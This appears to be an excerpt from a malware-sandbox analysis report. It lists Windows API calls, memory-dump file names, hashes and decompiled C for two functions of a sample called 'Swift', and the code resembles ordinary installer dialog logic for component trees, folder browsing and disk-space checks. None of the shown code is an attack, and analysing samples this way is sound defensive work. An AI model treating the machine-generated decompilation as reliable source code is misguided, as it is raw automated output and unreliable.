0x00405154
0x00000000

APIs

GetDlgItem.USER32 ref: 0040500E
GetDlgItem.USER32 ref: 0040501D
GetClientRect.USER32 ref: 0040505A
GetSystemMetrics.USER32 ref: 00405062
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405083
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405094
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050A7
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050B5
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050C8
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050EA
ShowWindow.USER32(?,00000008), ref: 004050FE
GetDlgItem.USER32 ref: 0040511F
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040512F
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405148
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405154
GetDlgItem.USER32 ref: 0040502C

Part of subcall function 00403E76: SendMessageA.USER32(00000028,?,00000001,00403CA7), ref: 00403E84

GetDlgItem.USER32 ref: 00405171
CreateThread.KERNEL32 ref: 0040517F
CloseHandle.KERNEL32(00000000), ref: 00405186
ShowWindow.USER32(00000000), ref: 004051AA
ShowWindow.USER32(00000000,00000008), ref: 004051AF
ShowWindow.USER32(00000008), ref: 004051F6
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405228
CreatePopupMenu.USER32 ref: 00405239
AppendMenuA.USER32 ref: 0040524E
GetWindowRect.USER32 ref: 00405261
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405285
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052C0
OpenClipboard.USER32(00000000), ref: 004052D0
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D6
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052DF
GlobalLock.KERNEL32 ref: 004052E9
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052FD
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405315
SetClipboardData.USER32 ref: 00405320
CloseClipboard.USER32 ref: 00405326

Strings

{, xrefs: 00405215

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 96e113b661445af8dcb7e5422b4b2f92594ceea452f9963b2c5f6fd273fe8bb2
Instruction ID: 292f7d26446f5f81b237fe7fd1a97f8b0e0c260a97b99bfb48385106a1e5f73f
Opcode Fuzzy Hash: 96e113b661445af8dcb7e5422b4b2f92594ceea452f9963b2c5f6fd273fe8bb2
Instruction Fuzzy Hash: F6A14A70800248FFEB119F60DC85AAE7F78FB48354F10812AFA05BA1A0C7785E51DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004047C0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E004047C0(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a27a8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2790 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2799 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404740(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2798) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79ed6c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79ed84;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79ed6c = _t315;
								 *0x79ed84 = _t315;
								 *0x7a27e0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2799 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79ed84;
									_t196 =  *0x7a27a8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a27ac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										_t198 =  *0x7a1f5c; // 0xaff8b2
										if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
											E004046FB(0x3ff, 0xfffffffb, E00404713(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a27ac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79ed84);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a27e0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79ed84 = GlobalAlloc(0x40,  *0x7a27ac << 2);
					_t250 = LoadBitmapA( *0x7a2780, 0x6e);
					 *0x79ed78 =  *0x79ed78 | 0xffffffff;
					_v24 = _t250;
					 *0x79ed80 = SetWindowLongA(_v8, 0xfffffffc, E00404DC1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79ed6c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x79ed6c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E41(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E41(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a27ac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79ed84 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79ed84 + _t318 * 4) = _t274;
									_t288 =  *( *0x79ed84 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a27ac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E76(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E76(_v12);
								L89:
								return E00403EA8(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x004047de
0x004047e4
0x004047e6
0x004047ec
0x004047f2
0x004047ff
0x00404808
0x0040480b
0x0040480e
0x00404a36
0x00404a3d
0x00404a51
0x00404a3f
0x00404a41
0x00404a44
0x00404a45
0x00404a4c
0x00404a4c
0x00404a5d
0x00404a6b
0x00404a6e
0x00404a84
0x00404afc
0x00404aff
0x00404b01
0x00404b0b
0x00404b19
0x00404b19
0x00404b1b
0x00404b25
0x00404b2b
0x00404b4c
0x00404b2d
0x00404b3a
0x00404b3a
0x00404b2b
0x00404b25
0x00000000
0x00404aff
0x00404a89
0x00404a94
0x00404a99
0x00404aa0
0x00404aa7
0x00404ab1
0x00404ab1
0x00404ab5
0x00404aba
0x00404abf
0x00404ad5
0x00404ac1
0x00404ac1
0x00404ac9
0x00404ad0
0x00404acb
0x00404acb
0x00404acb
0x00404ac9
0x00404ad9
0x00404adb
0x00404ae9
0x00404aea
0x00404af6
0x00404af9
0x00404af9
0x00404aba
0x00000000
0x00404aa7
0x00404a8b
0x00404a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b4f
0x00404b4f
0x00404b56
0x00404bca
0x00404bd1
0x00404bdd
0x00404bdd
0x00404be6
0x00404be8
0x00404bef
0x00404bf2
0x00404bf2
0x00404bf8
0x00404bff
0x00404c02
0x00404c02
0x00404c08
0x00404c0e
0x00404c14
0x00404c14
0x00404c21
0x00404d6e
0x00404d75
0x00404d92
0x00404d98
0x00404daa
0x00404daa
0x00000000
0x00404c27
0x00404c29
0x00404c31
0x00404c35
0x00404c35
0x00404c3d
0x00404c7e
0x00404c80
0x00404c90
0x00404c93
0x00404c98
0x00404c9f
0x00404ca2
0x00404d44
0x00404d4a
0x00404d50
0x00404d58
0x00404d69
0x00404d69
0x00000000
0x00404d58
0x00404ca8
0x00404cab
0x00404cb1
0x00404cb6
0x00404cb8
0x00404cba
0x00404cc0
0x00404cc7
0x00404ccc
0x00404cd3
0x00404cd6
0x00404cd6
0x00404cdd
0x00404ce9
0x00404ced
0x00404cef
0x00404cef
0x00404cdf
0x00404ce1
0x00404ce1
0x00404d0f
0x00404d1b
0x00404d2a
0x00404d2a
0x00404d2c
0x00404d2f
0x00404d38
0x00000000
0x00404c3f
0x00404c4a
0x00404c4d
0x00404c52
0x00404c54
0x00404c58
0x00404c68
0x00404c72
0x00404c74
0x00404c77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c5a
0x00404c5a
0x00404c60
0x00404c62
0x00404c62
0x00404c63
0x00404c64
0x00000000
0x00404c5a
0x00404c3d
0x00404c21
0x00404b5e
0x00000000
0x00404b74
0x00404b7e
0x00404b83
0x00000000
0x00000000
0x00404b95
0x00404b9a
0x00404ba6
0x00404ba6
0x00404ba8
0x00404bb7
0x00404bb9
0x00404bc0
0x00404bc3
0x00000000
0x00404bc3
0x00404b5e
0x00404814
0x00404819
0x00404823
0x00404824
0x0040482d
0x00404838
0x00404843
0x00404849
0x00404857
0x0040486c
0x00404871
0x0040487c
0x00404885
0x0040489a
0x004048ab
0x004048b8
0x004048b8
0x004048bd
0x004048c3
0x004048c5
0x004048c8
0x004048cd
0x004048d2
0x004048d4
0x004048d4
0x004048f4
0x004048f4
0x004048f6
0x004048f7
0x004048fc
0x004048ff
0x00404902
0x00404906
0x0040490b
0x00404910
0x00404914
0x00404919
0x0040491e
0x00404920
0x00404928
0x004049f2
0x00404a05
0x00000000
0x0040492e
0x00404931
0x00404934
0x00404937
0x00404937
0x0040493d
0x00404943
0x00404946
0x0040494c
0x0040494d
0x00404952
0x0040495b
0x00404962
0x00404965
0x00404968
0x0040496b
0x004049a7
0x004049d0
0x004049a9
0x004049b6
0x004049b6
0x0040496d
0x00404970
0x0040497f
0x00404989
0x00404991
0x00404998
0x004049a0
0x004049a0
0x0040496b
0x004049d6
0x004049d7
0x004049e3
0x004049e3
0x004049f0
0x00404a0b
0x00404a0f
0x00404a2c
0x00404a31
0x00404a34
0x00000000
0x00404a11
0x00404a16
0x00404a1f
0x00404dac
0x00404dbe
0x00404dbe
0x00404a0f
0x00000000
0x004049f0
0x00404928

APIs

GetDlgItem.USER32 ref: 004047D7
GetDlgItem.USER32 ref: 004047E4
GlobalAlloc.KERNEL32(00000040,?), ref: 00404830
LoadBitmapA.USER32 ref: 00404843
SetWindowLongA.USER32 ref: 0040485D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404871
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404885
SendMessageA.USER32(?,00001109,00000002), ref: 0040489A
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048A6
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048B8
DeleteObject.GDI32(?), ref: 004048BD
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004048E8
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048F4
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404989
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049B4
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049C8
GetWindowLongA.USER32 ref: 004049F7
SetWindowLongA.USER32 ref: 00404A05
ShowWindow.USER32(?,00000005), ref: 00404A16
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B19
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B7E
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B93
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BB7
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BDD
ImageList_Destroy.COMCTL32(?), ref: 00404BF2
GlobalFree.KERNEL32 ref: 00404C02
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C72
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D1B
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D2A
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D4A
ShowWindow.USER32(?,00000000), ref: 00404D98
GetDlgItem.USER32 ref: 00404DA3
ShowWindow.USER32(00000000), ref: 00404DAA

Strings

, xrefs: 00404D82
M, xrefs: 00404970
N, xrefs: 00404A54

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: c4acbe5523e7cbe2a177737baf8f0510e4643536247319801c8c4d5f9d9b4829
Instruction ID: c434a656137e855b90c49851c997068db4d2ae06293e0fa8825e3debbb820a9a
Opcode Fuzzy Hash: c4acbe5523e7cbe2a177737baf8f0510e4643536247319801c8c4d5f9d9b4829
Instruction Fuzzy Hash: B202A0B0A00208EFDB20DF95CD45AAE7BB5FB84314F10813AF611BA2E1C7799A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040427F Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040427F(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x79e560;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x7a3000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040542A(0x3fb, _t146);
					E00405DE7(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040542A(0x3fb, _t146);
							if(E00405759(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B85(0x79dd58, _t146);
							_t87 = E00405F11(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B85(0x79dd58, _t146);
								_t89 = E0040570C(0x79dd58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x79dd58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79dd58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79dd58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056BF(0x79dd58) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x79dd58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404713(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x7a1f5c; // 0xaff8b2
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E004046FB(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x79dd48);
									} else {
										E00404636(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a2824 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E63(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x79ed7c == _t158) {
									E00404214();
								}
								 *0x79ed7c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x79ed90;
							_v60 = E004045D0;
							_v56 = _t146;
							_v68 = E00405BA7(_t146, 0x79ed90, _t166, 0x79e160, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405678(_t146);
								_t125 =  *((intOrPtr*)( *0x7a2790 + 0x11c));
								if( *((intOrPtr*)( *0x7a2790 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405BA7(_t146, 0x79ed90, _t166, 0, _t125);
									if(lstrcmpiA(0x7a1720, 0x79ed90) != 0) {
										lstrcatA(_t146, 0x7a1720);
									}
								}
								 *0x79ed7c =  *0x79ed7c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056E5(_t146) != 0 && E0040570C(_t146) == 0) {
						E00405678(_t146);
					}
					 *0x7a1f58 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E41(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E41(_t166);
					E00403E76(_t165);
					_t138 = E00405F11(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EA8(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040427f
0x00404285
0x0040428b
0x00404298
0x004042a6
0x004042a9
0x004042b1
0x004042b7
0x004042b7
0x004042c3
0x004042c6
0x00404334
0x0040433b
0x00404412
0x00404419
0x00404428
0x00404428
0x0040442c
0x00404436
0x00404443
0x00404445
0x00404445
0x00404453
0x0040445a
0x00404461
0x00404464
0x0040449b
0x0040449d
0x004044a3
0x004044a8
0x004044ac
0x004044ae
0x004044ae
0x004044ca
0x00000000
0x004044cc
0x004044cf
0x004044dd
0x004044e3
0x004044e4
0x004044e7
0x004044ea
0x00000000
0x004044ea
0x00404466
0x00404468
0x0040446c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040446e
0x0040446e
0x0040447b
0x00404480
0x00000000
0x00000000
0x00404484
0x00404486
0x00404486
0x00404491
0x00404494
0x00404499
0x00000000
0x00000000
0x00000000
0x00000000
0x00404499
0x004044f6
0x00404500
0x00404503
0x00404506
0x0040450d
0x0040450d
0x0040450f
0x0040450f
0x00404514
0x00404516
0x0040451e
0x00404525
0x00404527
0x00404532
0x00404532
0x00404527
0x00404539
0x00404542
0x0040454c
0x00404554
0x0040456f
0x00404556
0x0040455f
0x0040455f
0x00404554
0x00404574
0x00404579
0x0040457e
0x00404587
0x00404587
0x00404590
0x00404592
0x00404592
0x0040459e
0x004045a6
0x004045b0
0x004045b0
0x004045b5
0x00000000
0x004045b5
0x00404464
0x0040441b
0x00404422
0x00000000
0x00000000
0x00000000
0x00404422
0x00404341
0x0040434a
0x00404364
0x00404369
0x00404373
0x0040437a
0x00404386
0x00404389
0x0040438c
0x00404393
0x0040439b
0x0040439e
0x004043a2
0x004043a9
0x004043b1
0x0040440b
0x004043b3
